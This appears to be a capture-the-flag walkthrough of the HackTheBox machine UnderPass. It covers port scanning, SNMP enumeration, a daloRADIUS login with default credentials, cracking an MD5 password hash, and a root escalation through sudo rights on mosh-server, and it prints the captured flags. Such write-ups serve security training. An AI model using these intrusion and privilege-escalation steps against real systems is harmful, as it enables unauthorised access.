️📦 HackTheBox: UnderPass
UnderPass is the most recently retired of HackTheBox’s machines and one that I’m not ashamed to admit took me far too long to solve.
❯ rustscan --addresses 10.10.11.48 -- -sCV -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Making networking exciting since... whenever.
[~] The config file is expected to be at "/home/psypherpunk/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.48:22
Open 10.10.11.48:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV -Pn" on ip 10.10.11.48
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-23 21:07 GMT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:07
Completed Parallel DNS resolution of 1 host. at 21:07, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:07
Scanning 10.10.11.48 [2 ports]
Discovered open port 22/tcp on 10.10.11.48
Discovered open port 80/tcp on 10.10.11.48
Completed Connect Scan at 21:07, 0.04s elapsed (2 total ports)
Initiating Service scan at 21:07
Scanning 2 services on 10.10.11.48
Completed Service scan at 21:07, 6.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.48.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 1.53s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Nmap scan report for 10.10.11.48
Host is up, received user-set (0.020s latency).
Scanned at 2024-12-23 21:07:27 GMT for 7s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
| 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
80/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:07
Completed NSE at 21:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.31 seconds
The website running on 80 has…nothing: it’s a bare Apache placeholder.
At this point I admit to having been stumped: no amount of fuzzing or content-discovery turned up anything relevant.
…until I considered the name of the box: UnderPass. UnDerPass. UDP.
FFS…
For the sake of brevity (UDP scans are sloooooow), there’s one port open:
❯ sudo nmap -sU -p 161 -Pn -sCV 10.10.11.48
Starting Nmap 7.94 ( https://nmap.org ) at 2024-12-23 23:34 GMT
Nmap scan report for 10.10.11.48
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: c7ad5c4856d1cf6600000000
| snmpEngineBoots: 29
|_ snmpEngineTime: 2h29m33s
| snmp-sysdescr: Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
|_ System uptime: 2h29m32.70s (897270 timeticks)
Service Info: Host: UnDerPass.htb is the only daloradius server in the basin!
daloradius? So that’s a thing:
“daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments.”
Tip
For reference, RADIUS itself:
“…is a networking protocol that provides centralized authentication, authorization, and accounting…”
A little searching turns up an article on How to install FreeRADIUS and Daloradius on Ubuntu 22.04 which suggests /daloradius/app/operators and, thankfully, yields a login page.
Furthermore, the same article lists the default credentials:
Username: administrator
Password: radius
…which allow authentication on the aforementioned login page.
There’s a Go to users list button which shows one user: svcMosh and an apparent password of 412DD4759978ACFCC81DEAB01B382403. CrackStation reveals that to be the MD5 of underwaterfriends.
Armed with a username and password, it’s now possible to authenticate via SSH:
❯ sshpass -p underwaterfriends ssh svcMosh@10.10.11.48
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
…
…and grab the user flag:
svcMosh@underpass:~$ cat user.txt
3ab9794834a603438334dab0064b3f49
The svcMosh user has sudo privileges:
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
mosh-server is a “server-side helper for mosh”, the latter being “Mosh: the mobile shell”. Among its various uses, one can start a server, binding to a UDP port:
svcMosh@underpass:~$ sudo /usr/bin/mosh-server new -p 1337
MOSH CONNECT 1337 vBTv9ZfL5FT1TF896btNVA
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 2205]
That seemingly starts the service, while detaching. mosh-server, of course, has a counterpart in mosh-client. Making note of the above output:
The 22-byte base64 session key given by mosh-server is supplied in the MOSH_KEY environment variable. This represents a 128-bit AES key that protects the integrity and confidentiality of the session.
…and connecting the mosh-server now running via sudo:
svcMosh@underpass:~$ MOSH_KEY=vBTv9ZfL5FT1TF896btNVA mosh-client 127.0.0.1 1337
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu Dec 19 01:40:28 PM UTC 2024
System load: 0.05 Processes: 251
Usage of /: 84.2% of 3.75GB Users logged in: 0
Memory usage: 9% IPv4 address for eth0: 10.10.11.48
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Having effectively connected to a root session, it’s now possible to grab the root flag:
root@underpass:~# cat /root/root.txt
0e6a4749b8351bf77ef805282888a3ca